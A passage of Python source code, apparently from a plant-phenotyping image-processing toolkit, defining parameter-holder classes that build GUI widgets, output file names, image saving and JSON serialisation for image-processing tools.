isinstance(self.allowed_values, str) or (\r\n \"input\" in self.allowed_values\r\n )\r\n\r\n @property\r\n def is_output(self):\r\n return isinstance(self.allowed_values, str) and not (\r\n \"input\" in self.allowed_values\r\n )\r\n\r\n @property\r\n def is_neutral(self):\r\n return self.is_output and (self.allowed_values in [\"label\"])\r\n\r\n @property\r\n def is_default(self):\r\n return self.value == self.default_value\r\n\r\n\r\nclass IptParamHolder(object):\r\n def __init__(self, **kwargs):\r\n super(IptParamHolder, self).__init__()\r\n\r\n self.block_feedback = False\r\n self._kwargs = None\r\n self._param_list = kwargs.get(\"_param_list\", None)\r\n if self._param_list is None:\r\n self._param_list = []\r\n self.build_params()\r\n for key, value in kwargs.items():\r\n self.set_or_add_value(key, value)\r\n\r\n def __eq__(self, other) -> bool:\r\n if (other is None) or (len(self.gizmos) != len(other.gizmos)):\r\n return False\r\n else:\r\n for s, o in zip(self.gizmos, other.gizmos):\r\n if (s.value != o.value) or (s.name != o.name):\r\n return False\r\n return True\r\n\r\n def 
copy(self):\r\n return self.__class__(**self.params_to_dict())\r\n\r\n def build_params(self):\r\n pass\r\n\r\n def reset(self, is_update_widgets: bool = True):\r\n self.block_feedback = True\r\n try:\r\n for p in self._param_list:\r\n p.value = p.default_value\r\n if is_update_widgets:\r\n p.update_label()\r\n p.update_input()\r\n p.update_output()\r\n finally:\r\n self.block_feedback = False\r\n\r\n def add(self, new_item) -> IptParam:\r\n try:\r\n self._param_list.append(new_item)\r\n except Exception as e:\r\n logger.exception(f'Failed to add param: \"{repr(e)}\"')\r\n else:\r\n return new_item\r\n\r\n def add_combobox(\r\n self,\r\n name: str,\r\n desc: str,\r\n default_value: str = \"\",\r\n values: dict = {},\r\n hint: str = \"\",\r\n ) -> IptParam:\r\n try:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=values,\r\n hint=hint,\r\n )\r\n param.widget_type = \"combo_box\"\r\n return self.add(param)\r\n except Exception as e:\r\n logger.exception(f'Failed to add param: \"{repr(e)}\"')\r\n\r\n def add_slider(\r\n self,\r\n name: str,\r\n desc: str,\r\n default_value: int = 0,\r\n minimum: int = 0,\r\n maximum: int = 100,\r\n hint: str = \"\",\r\n ) -> IptParam:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=(minimum, maximum),\r\n hint=hint,\r\n )\r\n param.widget_type = \"slider\"\r\n return self.add(param)\r\n\r\n def add_checkbox(self, name, desc, default_value: int, hint=\"\") -> IptParam:\r\n \"\"\"Add a checkbox to the widgets\r\n\r\n Arguments:\r\n name {str} -- name used to access the widget\r\n desc {str} -- text used for the label associated with the checkbox\r\n default_value {int} -- default state (0 or 1)\r\n\r\n Keyword Arguments:\r\n hint {str} -- hover hint (default: {''})\r\n\r\n Returns:\r\n IptParam -- built param\r\n \"\"\"\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=(0, 1),\r\n hint=hint,\r\n )\r\n param.widget_type = \"checkbox\"\r\n return self.add(param)\r\n\r\n def add_text_input(\r\n self,\r\n name: str,\r\n desc: str,\r\n default_value: str = \"-\",\r\n hint: str = \"\",\r\n is_single_line: bool = True,\r\n ) -> IptParam:\r\n if is_single_line:\r\n mode_ = \"single_line_text_input\"\r\n else:\r\n mode_ = \"multi_line_text_input\"\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=mode_,\r\n hint=hint,\r\n )\r\n param.widget_type = mode_\r\n return self.add(param)\r\n\r\n def add_text_output(\r\n self,\r\n is_single_line: bool,\r\n name: str,\r\n desc: str,\r\n default_value: str = \"-\",\r\n hint: str = \"\",\r\n ) -> IptParam:\r\n if is_single_line:\r\n mode_ = \"single_line_text_output\"\r\n else:\r\n mode_ = \"multi_line_text_output\"\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=mode_,\r\n hint=hint,\r\n )\r\n param.widget_type = mode_\r\n return self.add(param)\r\n\r\n def add_table_output(\r\n self,\r\n name: str,\r\n desc: tuple,\r\n default_value: dict = {},\r\n hint: str = \"\",\r\n ) -> IptParam:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=\"table_output\",\r\n hint=hint,\r\n )\r\n param.widget_type = \"table_output\"\r\n return self.add(param)\r\n\r\n def add_text_overlay(self, default_value: int = 0) -> IptParam:\r\n param = IptParam(\r\n
default_value=default_value,\r\n allowed_values=(0, 1),\r\n hint=\"Draw description text on top of images\",\r\n )\r\n param.widget_type = \"checkbox\"\r\n param.kind = \"text_overlay_cb\"\r\n return self.add(param)\r\n\r\n def add_label(self, desc: str, hint: str = \"\") -> IptParam:\r\n param = IptParam(\r\n name=f\"lbl_{len(self._param_list)}\",\r\n desc=desc,\r\n default_value=desc,\r\n allowed_values=\"label\",\r\n hint=hint,\r\n )\r\n param.widget_type = \"label\"\r\n return self.add(param)\r\n\r\n def add_separator(self, name: str = \"\") -> IptParam:\r\n if not name:\r\n name = f\"sep_{len(self._param_list)}\"\r\n param = IptParam(\r\n name=name,\r\n desc=\"\",\r\n default_value=\"\",\r\n allowed_values=\"label\",\r\n hint=\"\",\r\n )\r\n param.widget_type = \"label\"\r\n return self.add(param)\r\n\r\n def add_color_selector(\r\n self,\r\n name=\"color\",\r\n desc=\"Select color\",\r\n default_value=\"light_steel_blue\",\r\n hint=\"\",\r\n enable_none: bool = False,\r\n ) -> IptParam:\r\n if enable_none:\r\n values = {\"none\": \"none\"}\r\n else:\r\n values = {}\r\n values = {**values, **{k: k for k in ipc.all_colors_dict}}\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=values,\r\n hint=hint,\r\n )\r\n param.widget_type = \"combo_box\"\r\n param.kind = \"color_selector\"\r\n return self.add(param)\r\n\r\n def add_enabled_checkbox(self) -> IptParam:\r\n return self.add_checkbox(\r\n name=\"enabled\",\r\n desc=\"Activate tool\",\r\n default_value=1,\r\n hint=\"Toggle whether or not tool is active\",\r\n )\r\n\r\n def add_file_naming(\r\n self,\r\n output_format: str = \"source\",\r\n output_name: str = \"as_source\",\r\n global_prefix: str = \"\",\r\n ) -> IptParam:\r\n self.add_combobox(\r\n name=f\"{global_prefix}output_format\",\r\n desc=\"Image output format\",\r\n default_value=output_format,\r\n values=dict(\r\n source=\"As source image\",\r\n jpg=\"JPEG\",\r\n png=\"PNG\",\r\n tiff=\"TIFF\",\r\n tif=\"TIF\",\r\n ),\r\n )\r\n self.add_text_input(\r\n name=f\"{global_prefix}subfolders\",\r\n desc=\"Subfolders\",\r\n default_value=\"\",\r\n hint='Subfolder names separated by \",\"',\r\n )\r\n self.add_combobox(\r\n name=f\"{global_prefix}output_name\",\r\n desc=\"Output naming convention\",\r\n default_value=output_name,\r\n values=dict(\r\n as_source=\"Same as source\",\r\n hash=\"Use hash for anonymous names\",\r\n ),\r\n )\r\n self.add_text_input(\r\n name=f\"{global_prefix}prefix\",\r\n desc=\"Prefix\",\r\n default_value=\"\",\r\n hint=\"Use text as prefix\",\r\n )\r\n self.add_text_input(\r\n name=f\"{global_prefix}suffix\",\r\n desc=\"Suffix\",\r\n default_value=\"\",\r\n hint=\"Use text as suffix\",\r\n )\r\n self.add_checkbox(\r\n name=f\"{global_prefix}make_safe_name\",\r\n desc=\"Replace unsafe characters\",\r\n default_value=1,\r\n hint='Will replace *\"/\\\\[]:;|=,<> with \"_\"',\r\n )\r\n\r\n def build_path(\r\n self,\r\n file_prefix: str = \"\",\r\n salt: str = \"\",\r\n override_filename: str = \"\",\r\n ) -> str:\r\n \"\"\"Creates a fully qualified filename from data generated by add_file_naming\r\n\r\n Returns:\r\n str: File name\r\n \"\"\"\r\n return os.path.join(\r\n self.build_folder_path(file_prefix=file_prefix),\r\n self.build_filename(\r\n file_prefix=file_prefix,\r\n salt=salt,\r\n override_filename=override_filename,\r\n ),\r\n )\r\n\r\n def build_folder_path(self, file_prefix: str = \"\") -> str:\r\n fld = self.output_path\r\n subfolders = self.get_value_of(f\"{file_prefix}subfolders\")\r\n if 
subfolders:\r\n fld = os.path.join(\r\n fld, *[make_safe_name(sf) for sf in subfolders.split(\",\")]\r\n )\r\n\r\n return fld\r\n\r\n def build_filename(\r\n self,\r\n file_prefix: str = \"\",\r\n salt: str = \"\",\r\n override_filename: str = \"\",\r\n ) -> str:\r\n wrapper = self.wrapper\r\n\r\n if override_filename:\r\n dst_name = override_filename\r\n else:\r\n # Build output file name\r\n output_name_mode = self.get_value_of(f\"{file_prefix}output_name\")\r\n if output_name_mode == \"as_source\":\r\n dst_name = wrapper.file_handler.file_name_no_ext\r\n elif output_name_mode == \"hash\":\r\n dst_name = self.hash_luid()\r\n else:\r\n dst_name = \"unk\"\r\n logger.error(f\"Unknown output name convention: '{output_name_mode}'\")\r\n\r\n prefix = self.get_value_of(f\"{file_prefix}prefix\")\r\n if prefix:\r\n dst_name = prefix + dst_name\r\n\r\n suffix = self.get_value_of(f\"{file_prefix}suffix\")\r\n if suffix:\r\n dst_name += suffix\r\n\r\n if self.get_value_of(f\"{file_prefix}make_safe_name\"):\r\n dst_name = make_safe_name(dst_name)\r\n\r\n # Get new extension\r\n file_ext = self.get_value_of(f\"{file_prefix}output_format\")\r\n if file_ext == \"source\":\r\n file_ext = self.wrapper.file_handler.file_ext\r\n else:\r\n file_ext = f\".{file_ext}\"\r\n\r\n return f\"{dst_name}{salt}{file_ext}\"\r\n\r\n def save_images(self, additional_images: dict, file_prefix: str = \"\", **kwargs):\r\n wrapper = self.init_wrapper(**kwargs)\r\n dst_path = self.build_path(file_prefix=file_prefix)\r\n self.add_value(\r\n key=self.get_value_of(\"img_name\"),\r\n value=os.path.basename(dst_path),\r\n force_add=True,\r\n )\r\n force_directories(os.path.join(os.path.dirname(dst_path), \"\"))\r\n cv2.imwrite(filename=dst_path, img=self.result)\r\n # Add linked images\r\n if (\r\n self.get_value_of(\"grab_linked_images\", default_value=0) == 1\r\n ) and additional_images:\r\n file_ext = (\r\n wrapper.file_handler.file_ext\r\n if self.get_value_of(f\"{file_prefix}output_format\") == \"source\"\r\n else f\".{self.get_value_of(f'{file_prefix}output_format')}\"\r\n )\r\n base_name, _ = os.path.splitext(os.path.basename(dst_path))\r\n root_folder = os.path.join(os.path.dirname(dst_path), \"\")\r\n\r\n for k, v in additional_images.items():\r\n self.add_value(\r\n key=f'{self.get_value_of(\"img_name\")}_{k}',\r\n value=f\"{base_name}_{k}{file_ext}\",\r\n force_add=True,\r\n )\r\n cv2.imwrite(\r\n filename=os.path.join(\r\n root_folder,\r\n f\"{base_name}_{k}{file_ext}\",\r\n ),\r\n img=v,\r\n )\r\n\r\n def add_channel_selector(\r\n self,\r\n default_value,\r\n name=\"channel\",\r\n desc=\"Channel\",\r\n hint: str = \"\",\r\n enable_none: bool = False,\r\n ) -> IptParam:\r\n if enable_none:\r\n values = {\"none\": \"none\"}\r\n else:\r\n values = {}\r\n values = {\r\n **values,\r\n **{k: v for k, v in ipc.CHANNELS_VISIBLE.items()},\r\n }\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=values,\r\n hint=hint,\r\n )\r\n if enable_none:\r\n param.options[\"enable_none\"] = True\r\n param.widget_type = \"combo_box\"\r\n param.kind = \"channel_selector\"\r\n return self.add(param)\r\n\r\n def add_arithmetic_operator(\r\n self,\r\n default_value=\"plus\",\r\n name=\"operator\",\r\n desc=\"Arithmetic operator\",\r\n hint=\"Operator to use with operands\",\r\n ) -> IptParam:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=dict(plus=\"+\", minus=\"-\", mult=\"*\", div=\"/\", power=\"^\"),\r\n hint=hint,\r\n )\r\n 
param.widget_type = \"combo_box\"\r\n param.kind = \"arithmetic_operator\"\r\n return self.add(param)\r\n\r\n def add_source_selector(\r\n self,\r\n name: str = \"source_file\",\r\n desc: str = \"Select source file type\",\r\n default_value: str = \"source\",\r\n ) -> IptParam:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=dict(\r\n source=\"source\",\r\n mask=\"mask\",\r\n source_roi=\"Source with ROIs applied\",\r\n process_roi=\"Use roi created for process\",\r\n masked_source=\"masked source\",\r\n cropped_source=\"source cropped to keep ROI (if available)\",\r\n source_median=\"source with median filter (5 if not set)\",\r\n ),\r\n )\r\n param.widget_type = \"combo_box\"\r\n param.kind = \"source_selector\"\r\n return self.add(param)\r\n\r\n def add_color_map_selector(\r\n self,\r\n name=\"color_map\",\r\n default_value=\"c_2\",\r\n desc=\"Select pseudo color map\",\r\n hint=\"\",\r\n ) -> IptParam:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=dict(\r\n a_0=\"Autumn\",\r\n b_1=\"Bone\",\r\n c_2=\"Jet\",\r\n d_3=\"Winter\",\r\n e_4=\"Rainbow\",\r\n f_5=\"Ocean\",\r\n g_6=\"Summer\",\r\n h_7=\"Spring\",\r\n i_8=\"Cool\",\r\n j_9=\"HSV\",\r\n k_10=\"Pink\",\r\n l_11=\"Hot\",\r\n ),\r\n hint=hint,\r\n )\r\n param.widget_type = \"combo_box\"\r\n param.kind = \"color_map_selector\"\r\n return self.add(param)\r\n\r\n def add_color_space(self, default_value) -> IptParam:\r\n param = IptParam(\r\n name=\"color_space\",\r\n desc=\"Color space\",\r\n default_value=default_value,\r\n allowed_values=dict(HSV=\"HSV\", LAB=\"LAB\", RGB=\"RGB\"),\r\n )\r\n param.widget_type = \"combo_box\"\r\n param.kind = \"color_space_selector\"\r\n return self.add(param)\r\n\r\n def add_roi_type(self, default_value=\"other\") -> IptParam:\r\n param = IptParam(\r\n name=\"roi_type\",\r\n desc=\"Select action linked to ROI\",\r\n default_value=default_value,\r\n allowed_values=dict(\r\n keep=\"Keep region inside ROI\",\r\n delete=\"Delete region inside ROI\",\r\n crop=\"Crop image to ROI (most tools do not support this option)\",\r\n safe=\"Region inside ROI is safe\",\r\n enforce=\"Check mask position\",\r\n erode=\"Erode region inside ROI - mask only\",\r\n dilate=\"Dilate region inside ROI - mask only\",\r\n open=\"Open region inside ROI - mask only\",\r\n close=\"Close region inside ROI - mask only\",\r\n other=\"No predefined behavior\",\r\n ),\r\n )\r\n param.kind = \"roi_type_selector\"\r\n return self.add(param)\r\n\r\n def add_roi_name(self, default_value: str = \"unnamed_roi\") -> IptParam:\r\n param = self.add_text_input(\r\n name=\"roi_name\", desc=\"ROI name\", default_value=default_value\r\n )\r\n param.kind = \"roi_name_selector\"\r\n return param\r\n\r\n def add_tool_target(self) -> IptParam:\r\n param = IptParam(\r\n name=\"tool_target\",\r\n desc=\"Target IPT\",\r\n default_value=\"none\",\r\n allowed_values=dict(none=\"None\"),\r\n )\r\n param.kind = \"tool_target_selector\"\r\n return self.add(param)\r\n\r\n def add_roi_shape(self, default_value=\"rectangle\") -> IptParam:\r\n param = IptParam(\r\n name=\"roi_shape\",\r\n desc=\"Select ROI shape\",\r\n default_value=default_value,\r\n allowed_values=dict(\r\n rectangle=\"Rectangle\",\r\n circle=\"Circle, will be treated as rectangle for morphology\",\r\n ),\r\n )\r\n param.kind = \"roi_shape_selector\"\r\n return self.add(param)\r\n\r\n def add_roi_settings(\r\n self,\r\n default_name: str = \"unnamed_roi\",\r\n default_type: 
str = \"other\",\r\n default_shape: str = \"\",\r\n ) -> IptParam:\r\n self.add_roi_name(default_value=default_name)\r\n self.add_roi_type(default_value=default_type)\r\n if default_shape:\r\n self.add_roi_shape(default_value=default_shape)\r\n self.add_tool_target()\r\n\r\n def add_hierarchy_threshold(self, default_value: int = 35) -> IptParam:\r\n self.add_slider(\r\n name=\"hierarchy_threshold\",\r\n desc=\"Label merger threshold\",\r\n default_value=default_value,\r\n minimum=0,\r\n maximum=1000,\r\n hint=\"Regions connected by an edge with weight smaller than thresh are merged\",\r\n )\r\n\r\n def add_edge_detector(self, default_operator: str = \"canny_opcv\"):\r\n self.add_combobox(\r\n name=\"operator\",\r\n desc=\"Select edge detection operator\",\r\n default_value=default_operator,\r\n values=dict(\r\n canny_opcv=\"Canny OpenCV\",\r\n canny_scik=\"Canny Scikit\",\r\n laplacian=\"Laplacian\",\r\n sobel=\"Sobel\",\r\n sobel_v=\"Sobel vertical\",\r\n sobel_h=\"Sobel horizontal\",\r\n roberts=\"Roberts\",\r\n prewitt=\"Prewitt\",\r\n ),\r\n )\r\n self.add_spin_box(\r\n name=\"canny_sigma\",\r\n desc=\"Canny's sigma for scikit, aperture for OpenCV\",\r\n default_value=2,\r\n minimum=0,\r\n maximum=20,\r\n hint=\"Sigma.\",\r\n )\r\n self.add_spin_box(\r\n name=\"canny_first\",\r\n desc=\"Canny's first Threshold\",\r\n default_value=0,\r\n minimum=0,\r\n maximum=255,\r\n hint=\"First threshold for the hysteresis procedure.\",\r\n )\r\n self.add_spin_box(\r\n name=\"canny_second\",\r\n desc=\"Canny's second Threshold\",\r\n default_value=255,\r\n minimum=0,\r\n maximum=255,\r\n hint=\"Second threshold for the hysteresis procedure.\",\r\n )\r\n self.add_spin_box(\r\n name=\"kernel_size\",\r\n desc=\"Kernel size\",\r\n default_value=5,\r\n minimum=0,\r\n maximum=27,\r\n )\r\n self.add_spin_box(\r\n name=\"threshold\",\r\n desc=\"Threshold\",\r\n default_value=130,\r\n minimum=0,\r\n maximum=255,\r\n hint=\"Threshold for kernel based operators\",\r\n )\r\n self.add_checkbox(\r\n name=\"apply_threshold\", desc=\"Apply threshold\", default_value=1\r\n )\r\n\r\n def add_binary_threshold(self, add_morphology: bool = True):\r\n self.add_spin_box(\r\n name=\"min_t\",\r\n desc=\"Threshold min value\",\r\n default_value=0,\r\n minimum=0,\r\n maximum=255,\r\n )\r\n self.add_spin_box(\r\n name=\"max_t\",\r\n desc=\"Threshold max value\",\r\n default_value=255,\r\n minimum=0,\r\n maximum=255,\r\n )\r\n self.add_slider(\r\n name=\"median_filter_size\",\r\n desc=\"Median filter size (odd values only)\",\r\n default_value=0,\r\n minimum=0,\r\n maximum=51,\r\n )\r\n if add_morphology:\r\n self.add_morphology_operator()\r\n\r\n def add_roi_selector(self):\r\n self.add_text_input(\r\n name=\"roi_names\",\r\n desc=\"Name of ROI to be used\",\r\n default_value=\"\",\r\n hint=\"Operation will only be applied inside of ROI\",\r\n )\r\n\r\n def add_morphology_operator(self, default_operator: str = \"none\"):\r\n self.add_combobox(\r\n name=\"morph_op\",\r\n desc=\"Morphology operator\",\r\n default_value=default_operator,\r\n values=dict(\r\n none=\"none\", erode=\"erode\", dilate=\"dilate\", open=\"open\", close=\"close\"\r\n ),\r\n )\r\n self.add_spin_box(\r\n name=\"kernel_size\",\r\n desc=\"Kernel size\",\r\n default_value=3,\r\n minimum=3,\r\n maximum=101,\r\n )\r\n self.add_combobox(\r\n name=\"kernel_shape\",\r\n desc=\"Kernel shape\",\r\n default_value=\"ellipse\",\r\n values=dict(ellipse=\"ellipse\", rectangle=\"rectangle\", cross=\"cross\"),\r\n )\r\n self.add_spin_box(\r\n name=\"proc_times\",\r\n 
desc=\"Iterations\",\r\n default_value=1,\r\n minimum=1,\r\n maximum=100,\r\n )\r\n\r\n def add_exposure_viewer_switch(self):\r\n self.add_checkbox(\r\n name=\"show_over_under\",\r\n desc=\"Show over and under exposed parts\",\r\n default_value=0,\r\n )\r\n\r\n def add_button(\r\n self, name: str, desc: str, index: int = 0, hint: str = \"\"\r\n ) -> IptParam:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=index,\r\n allowed_values=\"input_button\",\r\n hint=hint,\r\n )\r\n param.kind = \"button\"\r\n self.add(param)\r\n\r\n def add_spin_box(\r\n self,\r\n name: str,\r\n desc: str,\r\n default_value: int = 0,\r\n minimum: int = 0,\r\n maximum: int = 100,\r\n hint: str = \"\",\r\n ):\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=(minimum, maximum),\r\n hint=hint,\r\n )\r\n param.widget_type = \"spin_box\"\r\n self.add(param)\r\n\r\n def add_date_picker(\r\n self, name: str, desc: str, default_value: int = 0, hint: str = \"\"\r\n ):\r\n pass\r\n\r\n def reset_grid_search(self):\r\n for p in self._param_list:\r\n p.grid_search_options = str(p.default_value)\r\n gsw = p.gs_input\r\n if gsw is not None:\r\n self.update_ui(\r\n callback=\"set_text\", widget=gsw, text=p.grid_search_options\r\n )\r\n\r\n def update_grid_search(self, ignore_composite: bool = True) -> None:\r\n for p in self._param_list:\r\n values = p.grid_search_options\r\n if ignore_composite and (\r\n (\";\" in values) or (\"|\" in values) or (\",\" in values)\r\n ):\r\n continue\r\n p.grid_search_options = str(p.value)\r\n gsw = p.gs_input\r\n if gsw is not None:\r\n self.update_ui(\r\n callback=\"set_text\", widget=gsw, text=p.grid_search_options\r\n )\r\n\r\n def reset_input(self) -> None:\r\n for p in self._param_list:\r\n if p.is_input:\r\n p.value = p.default_value\r\n\r\n def reset_output(self) -> None:\r\n for p in self._param_list:\r\n if p.is_output:\r\n p.value = p.default_value\r\n\r\n def find_by_name(self, name) -> IptParam:\r\n for p in self._param_list:\r\n if p.name == name:\r\n return p\r\n return None\r\n\r\n def get_value_of(self, key, default_value=None, scale_factor=1) -> str:\r\n if (self._kwargs is not None) and (key in self._kwargs):\r\n res = self._kwargs.get(key, None)\r\n if res is not None:\r\n return res\r\n p = self.find_by_name(key)\r\n res = p.value if p is not None else default_value\r\n if type(res) is int or (\r\n (type(res) is str) and (res[:1] in (\"-\", \"+\") and res[1:].isdigit())\r\n ):\r\n return round(int(res) * scale_factor) if scale_factor != 1 else int(res)\r\n else:\r\n return res\r\n\r\n def has_param(self, key: str) -> bool:\r\n d = {} if self._kwargs is None else dict(self._kwargs)\r\n d.update(self.params_to_dict())\r\n return key in d.keys()\r\n\r\n def has_key_matching(self, partial: str) -> bool:\r\n d = {} if self._kwargs is None else dict(self._kwargs)\r\n d.update(self.params_to_dict())\r\n for k in d.keys():\r\n if partial in k:\r\n return True\r\n return False\r\n\r\n def has_keys(self, keys) -> int:\r\n res = 0\r\n for key in keys:\r\n if self.has_param(key):\r\n res += 1\r\n return res\r\n\r\n def set_value_of(self, key, value, update_widgets: bool = False):\r\n p = self.find_by_name(key)\r\n if p is not None:\r\n if value is not None:\r\n p.value = value\r\n else:\r\n p.value = p.default_value\r\n if update_widgets:\r\n p.update_label()\r\n p.update_input()\r\n p.update_output()\r\n\r\n def set_or_add_value(self, key, value):\r\n p = self.find_by_name(key)\r\n if p is None:\r\n self.add(\r\n 
IptParam(name=key, desc=\"\", default_value=value, allowed_values=None)\r\n )\r\n else:\r\n if value is not None:\r\n p.value = value\r\n else:\r\n p.value = p.default_value\r\n\r\n def set_or_add_param(self, src_param, allow_add):\r\n if src_param is None:\r\n return False\r\n p = self.find_by_name(src_param.name)\r\n if (p is None) and not allow_add:\r\n return False\r\n elif p is not None:\r\n self._param_list.remove(p)\r\n self.add(src_param.copy())\r\n\r\n def get(self, key, value, default=None):\r\n p = self.find_by_name(key)\r\n if p is not None:\r\n return getattr(p, value)\r\n else:\r\n return default\r\n\r\n def update_output_from_dict(self, data: dict):\r\n self.reset_output()\r\n for p in self._param_list:\r\n val = data.get(p.name, None)\r\n if val is not None:\r\n p.update_output(output_value=str(val))\r\n\r\n def input_params(\r\n self,\r\n exclude_defaults: bool = False,\r\n excluded_params: tuple = (),\r\n forced_params: tuple = (),\r\n ):\r\n return [\r\n p\r\n for p in self.gizmos\r\n if (\r\n p.is_input\r\n and not (exclude_defaults and p.is_default)\r\n and (p.name not in excluded_params)\r\n )\r\n or (p.name in forced_params)\r\n ]\r\n\r\n def output_params(\r\n self,\r\n exclude_defaults: bool = False,\r\n excluded_params: tuple = (),\r\n forced_params: tuple = (),\r\n ):\r\n return [\r\n p\r\n for p in self.gizmos\r\n if (\r\n p.is_output\r\n and not (exclude_defaults and p.is_default)\r\n and (p.name not in excluded_params)\r\n )\r\n or (p.name in forced_params)\r\n ]\r\n\r\n def all_params(\r\n self,\r\n exclude_defaults: bool = False,\r\n excluded_params: tuple = (),\r\n forced_params: tuple = (),\r\n ):\r\n return [\r\n p\r\n for p in self.gizmos\r\n if (\r\n not (exclude_defaults and p.is_default)\r\n and (p.name not in excluded_params)\r\n )\r\n or (p.name in forced_params)\r\n ]\r\n\r\n def params_to_dict(\r\n self,\r\n include_input: bool = True,\r\n include_output: bool = False,\r\n include_neutral: bool = False,\r\n ):\r\n dic = {}\r\n for p in self.gizmos:\r\n if (\r\n (include_input and p.is_input)\r\n or (include_output and p.is_output)\r\n or (include_neutral and p.is_neutral)\r\n ):\r\n dic[p.name] = p.value\r\n return dic\r\n\r\n def update_inputs(self, wrapper, update_values: dict = {}):\r\n param_names_list = [p.kind for p in self.gizmos]\r\n update_values = dict(update_values)\r\n if \"channel_selector\" in param_names_list and wrapper is not None:\r\n update_values[\"channels\"] = {\r\n k: n for k, n in wrapper.file_handler.available_channels.items()\r\n }\r\n if \"hint_channels_select\" in param_names_list and wrapper is not None:\r\n channels = \",\".join(\r\n [k for k in wrapper.file_handler.available_channels.keys()]\r\n )\r\n update_values[\"hint\"] = f\"Available channels: {channels}\"\r\n\r\n channels = update_values.get(\"channels\", None)\r\n ipt_list = update_values.get(\"ipt_list\", None)\r\n hint = update_values.get(\"hint\", None)\r\n for p in self._param_list:\r\n if (p.kind == \"channel_selector\") and (channels is not None):\r\n p.update_input(new_values=channels)\r\n elif (p.kind == \"hint_channels_select\") and (hint is not None):\r\n p.hint = hint\r\n\r\n @property\r\n def gizmos(self):\r\n return self._param_list\r\n\r\n @property\r\n def has_input(self):\r\n for p in self._param_list:\r\n if p.is_input:\r\n return True\r\n return False\r\n\r\n @property\r\n def has_output(self):\r\n for p in self._param_list:\r\n if p.is_output:\r\n return True\r\n return False\r\n\r\n\r\nclass IptBase(IptParamHolder, ABC):\r\n def __init__(self, wrapper=None, 
**kwargs):\r\n super(IptBase, self).__init__(**kwargs)\r\n\r\n self._wrapper = wrapper\r\n self._result = None\r\n self.result = None\r\n self.demo_image = None\r\n self._old_lock_state = False\r\n\r\n self.output_path = \"\"\r\n\r\n def __repr__(self):\r\n return (\r\n f\"{type(self).__name__}(\"\r\n + f\",\".join([f\"{p.name}={p.str_value}\" for p in self.gizmos])\r\n + \")\"\r\n )\r\n\r\n def __str__(self):\r\n return f\"{type(self).__name__}_\" + self.input_params_as_str(\r\n exclude_defaults=True,\r\n excluded_params=(\"progress_callback\",),\r\n forced_params=(\"channel\",),\r\n )\r\n\r\n def __enter__(self):\r\n wrapper = self.wrapper\r\n if wrapper is not None:\r\n self._old_lock_state = wrapper.lock\r\n wrapper.lock = True\r\n return self.process_wrapper(), self\r\n\r\n def __exit__(self, exc_type, exc_val, exc_tb):\r\n self.wrapper.lock = self._old_lock_state\r\n\r\n def short_desc(self):\r\n res = f\"{type(self).__name__}_\"\r\n gizmos_info = {}\r\n for p in self.gizmos:\r\n if p.kind not in gizmos_info.keys():\r\n gizmos_info[p.kind] = str(p)\r\n if \"channel_selector\" in gizmos_info.keys():\r\n res += str(gizmos_info[\"channel_selector\"])\r\n elif \"roi_name_selector\" in gizmos_info.keys():\r\n res += str(gizmos_info[\"roi_name_selector\"])\r\n elif \"color_space_selector\" in gizmos_info.keys():\r\n res += str(gizmos_info[\"color_space_selector\"])\r\n return res\r\n\r\n def copy(self, copy_wrapper: bool = True, updates={}):\r\n if copy_wrapper:\r\n return self.__class__(wrapper=self.wrapper, **self.params_to_dict())\r\n else:\r\n return self.__class__(**self.params_to_dict())\r\n\r\n def to_json(self):\r\n return {\r\n \"name\": self.name,\r\n \"package\": self.package,\r\n CLASS_NAME_KEY: type(self).__name__,\r\n MODULE_NAME_KEY: type(self).__module__,\r\n PARAMS_NAME_KEY: self.params_to_dict(),\r\n GRID_SEARCH_PARAMS_NAME_KEY: {\r\n p.name: p.grid_search_options for p in self.gizmos\r\n },\r\n }\r\n\r\n @classmethod\r\n def from_json(cls, json_data: dict):\r\n class_name = json_data[CLASS_NAME_KEY]\r\n module_name: str = json_data[MODULE_NAME_KEY].replace(\"ip_tools\", \"ipt\")\r\n if \"ipt\" in module_name and \"ipapi\" not in module_name:\r\n module_name = module_name.replace(\"ipt\", \"ipso_phen.ipapi.ipt\", 1)\r\n if \"ipapi\" in module_name and \"ipso_phen\" not in module_name:\r\n module_name = module_name.replace(\"ipapi\", \"ipso_phen.ipapi\", 1)\r\n __import__(module_name)\r\n for _, obj in inspect.getmembers(sys.modules[module_name]):\r\n if inspect.isclass(obj) and (obj.__name__ == class_name):\r\n try:\r\n ipt = obj(**json_data[PARAMS_NAME_KEY])\r\n break\r\n except Exception as e:\r\n return e\r\n else:\r\n ipt = None\r\n if ipt is None:\r\n return None\r\n ipt._param_list = [p for p in ipt._param_list if p.allowed_values is not None]\r\n gs_params = json_data.get(GRID_SEARCH_PARAMS_NAME_KEY, None)\r\n if gs_params:\r\n for p in ipt.gizmos:\r\n gp = gs_params.get(p.name, None)\r\n if gp:\r\n p.grid_search_options = gp\r\n return ipt\r\n\r\n def execute(self, param, **kwargs):\r\n pass\r\n\r\n def init_wrapper(self, **kwargs) -> BaseImageProcessor:\r\n \"\"\"Initializes wrapper according to key arguments\r\n\r\n Returns:\r\n BaseImageProcessor -- Wrapper\r\n \"\"\"\r\n self._kwargs = kwargs\r\n wrapper = self._get_wrapper()\r\n self.demo_image = None\r\n if kwargs.get(\"reset_wrapper\", True) is True:\r\n wrapper.reset()\r\n return wrapper\r\n\r\n def process_grid_search(self, **kwargs):\r\n progress_callback = 